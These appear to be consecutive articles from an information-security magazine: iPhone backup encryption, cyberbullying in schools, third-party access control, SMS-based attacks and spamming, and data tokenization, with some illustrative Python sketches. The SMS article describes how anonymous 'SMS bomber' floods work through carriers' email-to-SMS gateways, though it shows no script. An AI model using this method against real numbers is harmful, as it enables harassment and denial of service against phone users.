While it can be argued that getting hold of a laptop with this sort of setup in place is a little difficult (nearly impossible some would say), you just have to look at the stats of lost laptops at airports to see that the possibility is there.
At the end of the day, an unencrypted backup of an iPhone is a treasure chest just waiting to be opened and dug through. The amount of information that can be found out about a target simply by digging through the various files with simple Unix/Linux tools is astonishing.
It takes an insignificant amount of effort to be a little more secure and you will be thanking your lucky stars when your machine is stolen. Most of the time the machines are probably wiped and reinstalled for resale, but these days, you never know who is after what.
The moral of this story? Encrypt. Everything. Always.
Matt Erasmus is an info-sec professional, packet junkie and Mac addict from South Africa.
As many children wrap up another school year, Iʼm reminded of the fact that for most, the past few months have left them with fond and lasting memories of friends, achievements and milestones – memories that they will cherish in later years. The problem of cyber bullying, however, makes this assumption invalid for a growing number of students. Today, this problem is far worse than when school children picked on kids during recess periods and inside the schoolyard, because the perpetrators of computer-generated taunts can now access their victims 24 hours a day, seven days a week.

The numbers are staggering. The National Crime Prevention Council released these eye-opening statistics in 2007:

• More than 40 percent of all teenagers with Internet access have reported being bullied online.

• A mere 10 percent of those kids who were bullied told their parents about the incident, and only 18 percent of the cases were reported to a local or national law enforcement agency.
• Fifty-eight percent of 4th through 8th graders reported having mean or cruel things said to them online. 53 percent said that they have said mean or hurtful things to others while online. 42 percent of those studied said they had been "bullied online", but almost 60 percent never told their parents about the incident.

• Ten percent of 770 young people surveyed were made to feel "threatened, embarrassed or uncomfortable" by a photo taken of them using a cell-phone camera.

While schools canʼt watch students around the clock, they can at least ensure that their networks, just like their playgrounds, are safe for kids. Protection against these kinds of attacks is arguably more critical for educational institutions than ensuring personal data is not compromised, because the negative impact of cyber bullying can have far greater implications.
Take 15-year-old Phoebe P., for example. The Massachusetts teenager committed suicide last January, after having been the recipient of a continuous barrage of mean online messages and emails. Action is most certainly required, so here are some effective strategies educators should implement to counter cyber bullying before the beginning of the new school year.

• Start using strong email/IM gateway filtering platforms. Internal school emails and IM chat platforms are the easiest way for bullies to access their victims. Thankfully, there are cost-effective, robust turnkey systems on the market that can plug into existing systems and set up a virtually impenetrable wall between the perpetrators and their targets.
• Make sure everyone knows youʼre watching and on the job. Most criminal acts (cyber bullying included) are conducted in secrecy. Shedding light on the perpetratorsʼ activities by telling them that theyʼre being watched is a great tactic in this particular situation. • Call for backup. Schools and educators should not have to fight cyber bullies alone, but rather get help from their system integrators and product vendors. The best partners are the ones who have offerings that specifically counter current and future attacks of this nature. This scourge must end, and teachers, principals and parents are the ones who must do it. Itʼs time they had the tools and experts at their disposal to make it happen.
Max Huang is the founder and CEO of O2Security (www.o2security.com), a manufacturer of network security appliances and disaster recovery offerings. He can be reached at
[email protected].
Tracks Eraser Pro (www.net-security.org/software.php?id=268) Tracks Eraser Pro is a privacy cleaner that can clean up all Internet tracks and other activity trails on your computer. With only one click, Tracks Eraser Pro allows you to erase the browser cache, cookies (with option to keep certain ones), history, typed URLs, auto-complete memory as well as index.dat from your browser, and Windows temp folders, run history, search history, open/save history, recent documents and more.
DSPAM (www.net-security.org/software.php?id=582) DSPAM is an extremely scalable, open-source statistical anti-spam filter. While most commercial solutions only claim a mere 95% accuracy (1 error in 20), a majority of DSPAM users frequently see around 99.95% (1 error in 2000) and can sometimes reach peaks as high as 99.991% (2 errors in 22,786, as with one particular user).
Samhain (www.net-security.org/software.php?id=125) Samhain is an open source file integrity and host-based intrusion detection system. It can run as a daemon process, and thus can remember file changes - contrary to a tool that runs from cron, if a file is modified you will get only one report, while subsequent checks of that file will ignore the modification as it is already reported (unless the file is modified again).
Server Inspector (www.net-security.org/software.php?id=574) Server Inspector is a professional monitoring tool. You can monitor Windows services, websites, applications, files, drives, hosts and databases. In case of an emergency Server Inspector can notify you via e-mail, SMS or a network message.
One of the most valuable benefits of the Internet is its ability to foster high levels of information sharing and collaboration. Not only has the Internet enabled massive efficiency gains when it comes to managing complex supply chains, it is in and of itself a supply chain for the distribution of information. The ability to engage online has provided government agencies with a wealth of strategic opportunities, especially when it comes to leveraging employees, partners and contractors in ways that might not be feasible outside of cyberspace.

However, stringent security and compliance requirements require government agencies to maintain strong controls over how information and people are managed online - and to be able to demonstrate that those controls are always in place. So how do IT departments manage the catch-22 of opening up their networks to strategic third parties without risking exposure of critical systems or data?

From a technology perspective, the major shift that needs to occur is to design and implement controls from a user-centric point of view. While this might not sound like a big deal, network security is by nature device-centric. Letʼs look at some real-world scenarios where a user- or identity-based approach to access control becomes a huge business enabler.
Outsourcing: Outsourcing is one of the most mature use cases for third-party access control. Managed security services, which are just a portion of the overall managed services market, were estimated by Forrester to be a $3 billion industry in 2008, and provide a good example of why a company would want an outsider to have unfettered access to critical systems. Outsourcing the daily management of critical infrastructure can save companies a significant amount of time and money. But with the rewards of outsourcing come new risks, such as opening up the network to your outsourcing partner. This risk is amplified by the fact that these users tend to be technically savvy and require access to critical systems. If they wanted to do harm they are well positioned to do so, and if they make a mistake it could have significant repercussions.
Cloud computing: Cloud computing has been getting a lot of attention lately, but the reality is that many of the same rules that apply to MSSPs also apply in cloud scenarios. In cloud environments you might have a variety of administrators accessing cloud infrastructure to manage and configure it, and cloud customers that require access to their data - in both cases there can be huge consequences if either set of users accesses anything but authorized systems and data. Third-party access control systems provide many of the controls that remove the security and compliance issues currently inhibiting mass adoption of cloud computing.

Cross-agency development/information sharing: In the federal arena, inter- and intra-agency information sharing - especially when it comes to application development - is an area of significant innovation. However, creating an environment where individuals have varying security clearances and strict information assurance requirements can be a challenge - especially if they need to move around the network, which is a common requirement in joint development scenarios.

Managing supply chains: A sophisticated supply chain requires multiple parties to have access to multiple applications or systems. In some cases, a simple portal model will suffice. In other cases, if competitors are bidding for a specific job, or in the transfer of sensitive goods, supply chain tracking can only work if strong controls are in place that dictate who has access to what systems.

Knowing that there are no silver bullets or one-size-fits-all solutions for security, here are some of the fundamental requirements for implementing the access controls required to enable the above scenarios:
1) Policy-driven: At the start of any technology deployment, common sense dictates an audit of current access policies to see if they are aligned with the needs of the business. If they arenʼt, they need to be adjusted in a way that is flexible enough to account for future change. This should be part and parcel of any access control solution. If the policy engine is not native to the specific solution, it should be able to integrate and communicate with other systems where access policies may already reside.

2) Enforceable: Policies are useless without the ability to enforce them. While this might sound like a no-brainer, the reality is that the more secure a system is, the more complex it is to manage and use. While you donʼt want trusted outsiders to have free rein on the network, you do want them to have easy access to the systems they need in order to do their jobs. Access rights and privileges are dictated via policies, and enforced via controls.

3) Auditable: Access control solutions must provide robust reporting and auditing capabilities, with information that can be easily disseminated to a diverse set of stakeholders with varying agendas. For example, a business lead might want a report that shows that no one went anywhere on the network they were not supposed to and that there are no compliance violations. An IT administrator might want a much more granular audit trail that can be used for compliance, forensics, e-discovery, SLAs, etc.

4) "Future-proof": Interoperability with legacy and future systems should be a given with any emerging technology. This is a fine line to walk. For example, many private and public sector agencies are embracing virtualization and cloud computing as a way to maximize resources while minimizing costs. That having been said, some of the worldʼs most powerful networks are still powered by mainframe systems that will need to talk to those virtualized environments. Making sure access control systems are both backward and forward compatible will lower the TCO and raise the ROI of any technology investment.

While this is just a baseline, itʼs a good start - any solution without these attributes will not provide the security and compliance controls needed for secure collaboration.
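As a toy illustration of the first three requirements (policy-driven, enforceable, auditable) working together, the sketch below evaluates a hard-coded policy table and writes an audit line for every decision. It is purely illustrative: the roles, systems and log format are invented for the example, and a real deployment would pull policies from an existing policy engine rather than a dictionary.

```python
# access_check.py - toy policy-driven access check with an audit trail (illustrative only).
import logging

logging.basicConfig(filename="access_audit.log", level=logging.INFO,
                    format="%(asctime)s %(message)s")

# Invented example policy: which roles may reach which systems.
POLICY = {
    "outsourced_admin": {"monitoring-console", "patch-server"},
    "supply_chain_partner": {"order-portal"},
}

def authorize(user, role, system):
    """Enforce the policy table and record every decision for later audit."""
    allowed = system in POLICY.get(role, set())
    logging.info("user=%s role=%s system=%s decision=%s",
                 user, role, system, "ALLOW" if allowed else "DENY")
    return allowed

if __name__ == "__main__":
    print(authorize("alice", "outsourced_admin", "patch-server"))   # True
    print(authorize("alice", "outsourced_admin", "hr-database"))    # False
```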
Dave Olander is SVP of Engineering at Xceedium (www.xceedium.com), where he oversees the evolution of the Xceedium GateKeeper.
According to recent news, users use their mobile phones for many tasks, but relatively few phone calls. Instead of calling, people prefer to send text messages and use their mobile phone for browsing, listening to music and emailing. Three-quarters of the teen population and 90 percent of households in the United States have a mobile phone. However, according to industry data, the amount of voice minutes has stagnated, while the number of text messages has increased considerably. Itʼs no wonder, then, that the cracker community sees the SMS mode of communication as an opportunity to exploit and a way of reaping maximum benefits. In the last two years, there has been a substantial rise in attacks conducted via text messages. The bad guys are working hard to find a way to exploit mobile devices by taking advantage of a vulnerability or a loophole in texting.
But let us revisit some of the popular exploits used recently.

In the spring of 2009, smartphone users were taken aback by the sophistication of an SMS worm attack known as YXES, which targeted Symbian devices. The worm delivered a text message with a link to a website that, if followed, would allow a malicious payload to be downloaded onto the victimʼs device. Once a device was infected, the malicious payload attempted to send SMS messages to contacts in the victimʼs phone log. The worm also stole the victimʼs device information and uploaded it to a server.

In the summer of 2009, researchers did a live demonstration of an exploit at the Black Hat conference which allowed them to take complete control of a victimʼs iPhone by sending a unique SMS message. Later, in the fall of 2009, RIM issued an advisory about a certificate-handling flaw that could allow an attacker to trick users into visiting malicious websites via SMS messages.

A denial of service attack dubbed "Curse of Silence", which limits the number of SMS messages that can be received by a mobile device, was disclosed and demonstrated at the 25th Chaos Communication Congress (25C3) in 2008, and it also involved sending a specially crafted SMS message to the victimʼs mobile device. According to security researchers at Pennsylvania State University, attackers could cause denial of service by spamming the mobile network and, if successful, they could cripple it.

Last, but not least, is the ubiquitous threat to which every smartphone platform is vulnerable: SMS spamming.

Neither smartphones nor service providers offer a feature that could regulate the flow of incoming text messages and verify their contents on the userʼs device. Thus, smartphone users are vulnerable to attacks via SMS and to spam text messages sent by companies that want to promote their products. These unsolicited text messages are not only irritating, but they can also pose a security risk to the users. Considering the increase in SMS-based attacks on smartphones, it has become essential to have certain policies in place to verify and regulate incoming text messages. This article aims to educate users about the fact that SMS spamming can be easily executed while simultaneously maintaining complete anonymity. To clarify this point, this article will discuss Windows and Unix-like platform based SMS spamming techniques.

SMS spamming via Windows

On Windows, the spammer can use an application like "SMS bomber" that can be easily coded using VB (Visual Basic) or Java. This application has a simple front end that requires the following information: the victimʼs phone number, service provider, message and the number of times the SMS will be sent (as shown below). Once the spammer clicks on the "BOMB" button, the application composes an email message similar to the one shown below and emails it to the SMS gateway of the victimʼs service provider. The email addresses of the SMS gateways of the various service providers are publicly available on numerous sites and public forums, and the developer can use this information in the application.

SMS spamming via Linux

The previous section discusses an application that can send a large number of spam text messages to the victim. However, there is also an easier way of doing this: a spammer can use a script. The script that I tested sends two hundred and fifty text messages to the victim. Nevertheless, this number can be changed to hundreds or thousands and even higher - to the extent that it can even clog network resources. I tested the script on a T-Mobile and a Verizon number, and the results are shown on the following page (Windows HTC and BlackBerry devices).

Anti-spam on the smartphone

Anti-spam technology for SMS spam differs from anti-spam technology for email spam. Because third-party vendors have limited control over the features supported by mobile platforms, endpoint anti-spam security is the most feasible solution. The following options should be useful:

• Enable SMS/Call blocking - blocks SMS messages and calls from specific numbers.
• Enable Shortcode Blocking - blocks SMS messages from numbers that have five or fewer digits.
• Prompt to Block Ignored Callers - generates a prompt message before ignoring the SMS or call from a blocked number.

SMS messages sent over the Internet using software applications like SMS Bomber do not have an originating number. Thus, when the service vendor delivers such an SMS to the victim, it appears to originate from a four-digit number. If there is anti-spam software on the userʼs device and the "Enable Shortcode Blocking" setting is on, it blocks SMS messages coming from numbers with fewer than five digits and logs the result in the spam log.
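As a defensive illustration of that last setting, here is a minimal Python sketch of a shortcode filter: it drops any message whose sender ID has five or fewer digits and records the decision in a spam log. The message format and log file name are invented for the example; a real implementation would hook into the handset's messaging stack rather than run as a standalone script.

```python
# shortcode_filter.py - toy illustration of the "Enable Shortcode Blocking" behavior.
import logging

logging.basicConfig(filename="spam.log", level=logging.INFO,
                    format="%(asctime)s %(message)s")

def allow_message(sender, body):
    """Block senders whose ID is five or fewer digits, as shortcode blocking does."""
    if sender.isdigit() and len(sender) <= 5:
        logging.info("blocked shortcode sender=%s body=%r", sender, body)
        return False
    return True

if __name__ == "__main__":
    print(allow_message("1234", "You won a prize!"))        # False - blocked and logged
    print(allow_message("+15551234567", "See you at 8"))    # True  - delivered
```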
Mayank Aggarwal is a security researcher at Global Threat Center, SMobile Systems. His research focuses on exploiting security loopholes in smartphones, malware analysis and reverse engineering. He is a certified ethical hacker (CEH) and a Sun certified Java programmer (SCJP). (
[email protected], twitter: unsecuremobile).
This is a new approach to data tokenization – one that eliminates challenges associated with standard centralized tokenization. The usual way of generating tokens is prone to issues that impact the availability and performance of the data, particularly when it comes to high-volume operations. From a security standpoint, it is critical to address the issue of collisions, caused when tokenization solutions assign the same token to two separate pieces of data. This next-generation tokenization solution addresses all of these issues: system performance, availability and scaling are enhanced; numeric and alpha tokens are generated to protect a wide range of high-risk data; key management is greatly simplified; and collisions are eliminated. This new approach has the potential to change where tokenization can be used.

Different ways to render data unreadable

There are three different ways to render data unreadable:

1) Two-way cryptography with associated key management processes
www.insecuremag.com
2) One-way transformations including truncation and one-way cryptographic hash functions 3) Index tokens and pads. Two-way encryption of sensitive data is one of the most effective means of preventing information disclosure and, consequently, fraud. Cryptographic technology is mature and wellproven. The choice of encryption scheme and topology is critical in deploying a secure, effective and reasonable control. Hash algorithms are one-way functions that turn a message into a fingerprint and are usually no more than a dozen bytes long. Truncation will discard part of the input field. These approaches are used to reduce the cost of securing data fields when data is not needed to do business and when there will never be a need to get the original data back again. Tokenization consists of substituting sensitive data with replacement values that retain all the essential characteristics without compromising the security of the data.
75
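As a rough Python illustration of the one-way options (my own example, not taken from any particular product), the following sketch hashes and truncates a sample card number; neither result can be turned back into the original value.

# Illustrative sketch of the one-way transformations described above.
import hashlib

pan = "4111111111111111"   # a sample card number

# One-way cryptographic hash: a fixed-length fingerprint; the original value
# cannot be recovered. In practice a keyed hash (HMAC) is preferable, because
# card numbers have so little entropy that plain hashes can be brute-forced.
fingerprint = hashlib.sha256(pan.encode()).hexdigest()

# Truncation: discard part of the field, keeping only what the business needs.
truncated = "*" * 12 + pan[-4:]

print(fingerprint)   # 64 hex characters, irreversible
print(truncated)     # "************1111"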
A token can be thought of as a claim check that an authorized user or system can use to obtain sensitive data such as a credit card number. When implementing tokenization, all credit card numbers usually stored in business applications and databases are removed and placed in a highly secure, centralized encryption management server that can be protected and monitored using robust encryption technology. A central token solution can:

• Minimize the risk of exposing data with intrinsic value
• Reduce the number of potential attack targets
• Reduce the cost of PCI assessment.

All industries can benefit from centralization and tokenization of data. Tokenization is about understanding how to design systems and processes to minimize the risk of exposing data elements with intrinsic (or market) value.
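The claim-check model can be illustrated with a toy token vault in Python. This is only a sketch of the general idea; a real token server would add encryption of the stored values, access control, auditing and high-availability replication.

# Toy "claim check" token vault (illustration only).
import secrets

class TokenVault:
    def __init__(self):
        self._vault = {}     # token -> sensitive value
        self._reverse = {}   # sensitive value -> token, so each value gets one token

    def tokenize(self, pan):
        if pan in self._reverse:
            return self._reverse[pan]
        while True:
            # Random 12 digits plus the original last four, so downstream
            # systems can still perform business checks on the token.
            token = "".join(str(secrets.randbelow(10)) for _ in range(12)) + pan[-4:]
            if token not in self._vault:   # avoid assigning the same token twice
                break
        self._vault[token] = pan
        self._reverse[pan] = token
        return token

    def detokenize(self, token):
        # Redeeming the claim check; only authorized callers should reach this.
        return self._vault[token]

vault = TokenVault()
t = vault.tokenize("4111111111111111")
print(t)                     # a 16-character token ending in 1111
print(vault.detokenize(t))   # the original card number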
An enterprise tokenization strategy reduces the overall risk to the enterprise by limiting the number of people who have access to confidential data. When tokenization is applied strategically to enterprise applications, confidential data management costs are reduced and the risk of a security breach drops sharply: security is immediately strengthened by reducing the number of potential targets for would-be attackers. Studies have shown that annual audits average $225K per year for the world's largest credit card acceptors, so any business that collects, processes or stores payment card data is likely to gain measurable benefits from central tokenization. Most of the tokenization packages available today are focused on the Point of Sale (POS): card data is removed from the process at the earliest point and a token with no value to an attacker is provided in its place. These approaches are offered by third party gateway vendors and other service providers.
Common myths about tokenization

• Myth: Data is gone forever if you lose access to the encryption keys
• Myth: Do not encrypt data that will be tokenized
• Myth: Tokens transparently solve everything.

There is a lot of erroneous information about tokenization out there. For example, that tokenization is better than encryption because "if you lose access to the encryption keys the data is gone forever." This issue exists with both tokenization and encryption, and in both cases it can be managed through proper key management and a secure key recovery process. Both a key server and a token server can crash, and therefore both must have a backup. The token server usually encrypts the data stored in it, so the token server can also lose its keys. A solid key management solution and process is a critical part of any enterprise data protection plan.

Some articles encourage businesses not to encrypt data that they plan to tokenize. They claim that encrypted data takes more tokenization space than clear text data, and that many forms of sensitive data contain more characters than a 16-digit credit card number, causing storage and manageability problems. This is untrue if you are using Format-Controlling Encryption (FCE). Telling companies not to encrypt because of an issue that is easily addressed denies them a critical layer of security that adds to the defense of sensitive data.

Tokenization can often be a complicated affair in larger retail environments or enterprises because the data resides in many places, different applications, and service providers. Applications that have to process the real value of the data would need to be reworked to support tokenization, and the cost of changing the application code can be hard to justify when considering the level of risk reduction. Regardless of industry, if the data resides in many different places, switching to tokenization will probably require some programming changes, and rebuilding may not be possible with a legacy application.
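The article does not describe how FCE works internally, so the following Python sketch only illustrates the general format-preserving idea it relies on: the ciphertext of a 16-digit number is itself a 16-digit number, so encrypting before tokenizing does not inflate the data. This toy Feistel construction is my own and is not suitable for production use.

# Toy format-preserving encryption over a 16-digit number (illustration only).
import hmac
import hashlib

HALF = 10 ** 8     # each Feistel half is an 8-digit number
ROUNDS = 8

def _round_fn(key, rnd, half):
    # Keyed pseudo-random function for one Feistel round.
    digest = hmac.new(key, f"{rnd}:{half}".encode(), hashlib.sha256).digest()
    return int.from_bytes(digest[:8], "big") % HALF

def fpe_encrypt(pan, key):
    left, right = int(pan[:8]), int(pan[8:])
    for rnd in range(ROUNDS):
        left, right = right, (left + _round_fn(key, rnd, right)) % HALF
    return f"{left:08d}{right:08d}"

def fpe_decrypt(ct, key):
    left, right = int(ct[:8]), int(ct[8:])
    for rnd in reversed(range(ROUNDS)):
        left, right = (right - _round_fn(key, rnd, left)) % HALF, left
    return f"{left:08d}{right:08d}"

key = b"demo-key-not-for-production"
ct = fpe_encrypt("4111111111111111", key)
print(ct, fpe_decrypt(ct, key))   # 16-digit ciphertext, then the original number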
Tokenizing and the data lifecycle

The combined approaches of tokenization and encryption can be used to protect the whole data lifecycle in an enterprise. They also provide high quality, production-level data for test environments, virtualized servers and outsourced environments. In the development lifecycle there is a need to perform high quality test scenarios on production-quality test data by reversing the data hiding process. Key data fields that can be used to identify an individual or corporation need to be cleansed to depersonalize the information. In the early stages of implementation, cleansed data needs to be easily restored (for downstream systems and feeding systems), which requires two-way processing. The restoration process should be limited to situations for which there is no alternative to using production data, and authorization to use it must be limited and controlled. In some situations, business rules must be maintained during any cleansing operation (addresses for processing, dates of birth for age processing, names for gender distinction). There should also be the ability to set parameters, or to select or identify fields to be scrambled, based on a combination of business rules.
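As a hedged Python sketch of the cleansing idea (my own example, with hypothetical field names): identifying fields are replaced while the business rules mentioned above are preserved, and a tightly controlled mapping allows restoration where no alternative to production data exists.

# Sketch of test-data cleansing that preserves business rules (illustration only).
import secrets
from datetime import date

MALE_NAMES = ["John Doe", "Alan Smith"]
FEMALE_NAMES = ["Jane Doe", "Ann Smith"]

restore_map = {}   # pseudonym -> original name; access must be limited and audited

def cleanse_record(record):
    cleansed = dict(record)

    # Name: substitute a pseudonym but keep the gender distinction.
    pool = FEMALE_NAMES if record["gender"] == "F" else MALE_NAMES
    pseudonym = secrets.choice(pool)
    restore_map[pseudonym] = record["name"]   # enables controlled, two-way restoration
    # (a real solution issues a unique pseudonym per record; this toy map can collide)
    cleansed["name"] = pseudonym

    # Date of birth: keep only the year so age-based processing still works.
    cleansed["dob"] = date(record["dob"].year, 1, 1)
    return cleansed

original = {"name": "Alice Example", "gender": "F", "dob": date(1980, 6, 15)}
print(cleanse_record(original))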
Should a company build their own tokenizing solution?

Developing all the capabilities needed to build an in-house solution can present significant challenges. In order to implement tokenization effectively, all applications that currently house payment data must be integrated with the centralized tokenization server. Developing these interfaces requires a great deal of expertise to ensure performance and availability, and writing an application that is capable of issuing and managing tokens in heterogeneous environments, with support for multiple field length requirements, can be complex and challenging.

Furthermore, ongoing support of such an application can be time consuming and difficult. Allocating a dedicated resource to this large undertaking, and covering its responsibilities, could present logistical, tactical, and budgetary challenges. For many organizations, locating the in-house expertise to develop such complex capabilities as key management, token management, policy controls, and heterogeneous application integration can be very difficult. Writing code that interfaces with multiple applications, while minimizing the performance impact on those applications, presents an array of challenges. The overhead of maintaining and enhancing a security product of this complexity can ultimately represent a huge resource investment and a distraction from an organization's core focus and expertise. Security administrators looking to gain the benefits of centralization and tokenization without having to develop and support their own tokenization server should look at vendors that offer off-the-shelf solutions.

Reasons to keep the token server in-house

• Liability and risk
• Many applications use or store data
• Multi-channel commerce
• Security of outsourcing
• Recurring cost of tokenization when data volume is increasing, since an outsourcer may charge based on transaction volume
• Issues of transparency, availability, performance and scalability.

Typically, companies do not want to outsource secure handling of data since they cannot outsource risk and liability. Organizations are not willing to move the risk from their environment into a potentially less secure hosted environment. Furthermore, enterprises need to maintain certain information about transactions at the point of sale (POS), as well as at higher levels. In most retail systems there are multiple applications that use or store card data, from the POS to the data warehouses, as well as sales audit, loss prevention, and finance. At the same time, the system needs to be adequately protected from data thieves.

Merchants who gather card data via Web commerce, call centers and other channels should ensure that the product or service they use can tokenize data through all channels.
Not all offerings in the market work well or cost-effectively in a multi-channel environment, particularly if the token service is outsourced, so merchants need to ensure that their requirements reflect current and near-future channel needs. Another concern is that tokenization is new and unproven, and can pose an additional risk relative to mature encryption solutions. A risk management analysis will reveal whether the cost of deploying in-house tokenization is worth the benefits. An outsourcing environment must be carefully reviewed from a security point of view and must provide a reliable service to each globally connected endpoint. Many merchants continue to object to having anyone other than themselves keep their card data. Often, these are leading merchants that have made significant investments in data security and simply do not believe that any other company has more motivation (or better technology) than they do to protect their data.

Along with separation of duties and auditing, a tokenization solution requires a solid encryption and key management system to protect the information in the centralized token server. By combining encryption with tokenization, organizations can achieve security, efficiency, and cost savings across application areas within an enterprise.
Holistic solutions can support end-to-end field encryption, which is an important part of the next generation protection of the sensitive data flow. In some data flows, the best combination is end-to-end field encryption utilizing format-controlling encryption from the point of acquisition into the central systems. At that point, the data field is converted to a token for permanent use within the central systems. A mature solution should provide this integration between the encryption and tokenization processes.

Security is addressed by running the tokenization solution in-house on a high security network segment isolated from all other data and applications. If a segmented approach is used, most tokenization requests will need to be authorized to access this highly sensitive server. Access to the token server must be granted based on authentication and authorization, over an encrypted channel, with monitoring and/or blocking of suspicious transaction volumes and requests.

Transparency, availability, performance, scalability and security are common concerns with tokenization, particularly if the service is outsourced. Transparency can be enhanced by selecting a tokenization solution that is well integrated into enterprise systems like databases. Availability concerns can be addressed by selecting a solution that runs in-house on a high availability platform. Performance issues can be addressed by selecting a solution that runs locally on your high transaction volume servers. Scalability is best addressed by selecting a solution that runs in-house on your high performance corporate backbone network.

The solution: Distributed tokenization

Distributed tokenization is a method of storing sensitive strings of characters on a local server, and it changes where tokenization can be used. After years of research and development, Protegrity has developed a solution by intelligently altering the traditional back-end processes used in tokenization. This new, patent-pending way to tokenize data eliminates the challenges associated with standard centralized tokenization and solves the issues described above with outsourcing. Particularly in high volume operations, the usual way of generating tokens is prone to issues that impact the availability and performance of the data, and from a security standpoint it is critical to address the collisions that occur when a tokenization solution assigns the same token to two separate pieces of data.
This next generation tokenization solution addresses all of these issues: system performance, availability and scaling are enhanced, numeric and alpha tokens are generated, key management is greatly simplified, and collisions are eliminated. The benefits include scalability through multiple parallel instances, dramatically higher performance, high availability, centralized or distributed deployment, no token collisions, and support for PCI and PII data.

A solution can provide easy export of the static token tables to remote token servers to support a distributed tokenization operation. The static token tables can be distributed by using a simple file export to each token server, and each token table should be encrypted throughout this export and import operation.
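To make the static-table idea concrete, here is a rough Python sketch of table-based tokenization. The article does not disclose Protegrity's actual algorithm; this toy version (my own) only illustrates how a pre-generated, exportable lookup table lets each token server tokenize independently, deterministically and without collisions, and it is not a secure construction on its own.

# Sketch of tokenization driven by a static, exportable lookup table.
import json
import secrets

GROUP = 10_000   # a 16-digit number is handled as four 4-digit groups

def build_static_table():
    """One-time generation of a random permutation of 0..9999."""
    table = list(range(GROUP))
    secrets.SystemRandom().shuffle(table)
    return table

def tokenize(pan, table):
    groups = [int(pan[i:i + 4]) for i in range(0, 16, 4)]
    # Position-dependent lookup so repeated groups do not yield repeated tokens.
    out = [table[(g + i) % GROUP] for i, g in enumerate(groups)]
    return "".join(f"{g:04d}" for g in out)

def detokenize(token, table):
    inverse = {v: k for k, v in enumerate(table)}
    groups = [int(token[i:i + 4]) for i in range(0, 16, 4)]
    out = [(inverse[g] - i) % GROUP for i, g in enumerate(groups)]
    return "".join(f"{g:04d}" for g in out)

table = build_static_table()
# The same table can be exported (encrypted) to each remote token server,
# letting every instance tokenize and detokenize in parallel.
export = json.dumps(table)

t = tokenize("4111111111111111", table)
print(t, detokenize(t, table))   # token, then the recovered card number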
Conclusion

This new way to tokenize data eliminates the challenges associated with standard centralized tokenization, and it has the potential to change where tokenization can be used. It is important to understand that data is stored to support follow-up checks, audits, and analysis; at the same time, the information stored on those servers is a security risk and needs to be protected. Even though the examples discussed in this article are mostly concerned with credit card numbers, similar issues are encountered when handling social security numbers, driving license numbers or bank account numbers. Companies need to deploy an enterprise tokenization and key management solution to lock down data across the enterprise.

A holistic solution for data security should be based on centralized data security management that protects sensitive information from acquisition to deletion, across the enterprise. Third party data security vendors develop solutions that protect data in the most cost effective manner, and external security technology specialists with deep expertise in data security techniques, encryption key management, and security policy in distributed environments are needed to find the most cost effective approach for each organization. To maximize security with minimal business impact, a high performance, transparent solution optimized for the dynamic enterprise will require a risk-adjusted approach to data security. This approach optimizes the data security techniques deployed on each system in the enterprise.
Ulf T. Mattsson is the CTO of Protegrity. Ulf created the initial architecture of Protegrityʼs database security technology, for which the company owns several key patents. His extensive IT and security industry experience includes 20 years with IBM as a manager of software development and a consulting resource to IBM's Research and Development organization, in the areas of IT Architecture and IT Security. Ulf holds a degree in electrical engineering from Polhem University, a degree in Finance from University of Stockholm and a master's degree in physics from Chalmers University of Technology.